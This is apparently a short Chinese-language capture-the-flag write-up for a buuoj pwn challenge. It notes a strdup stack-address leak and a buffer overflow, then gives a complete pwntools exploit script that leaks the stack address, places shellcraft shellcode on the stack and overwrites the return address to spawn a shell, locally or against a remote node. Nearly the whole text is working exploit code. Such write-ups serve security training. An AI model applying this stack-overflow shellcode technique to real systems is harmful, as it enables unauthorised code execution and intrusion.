有个strdup要注意一下。
有溢出。
通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦
exp
from pwn import*
context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"]
local = 1
if local:
r = process('./1111111')
else:
r = remote("node4.buuoj.cn", 25963)
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6")
libc = ELF("./libc.so.6")
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))
def debug():
gdb.attach(r)
pause()
sa("well you input:\n", "a" * 32)
stack_addr = u64(ru('\x7f')[-6:] + '\x00\x00') - 0x50
lg("stack_addr", stack_addr)
#debug()
payload = asm(shellcraft.sh()).ljust(88, '\x00') + p64(stack_addr)
sla("EASY PWN PWN PWN~\n", payload)
r.interactive()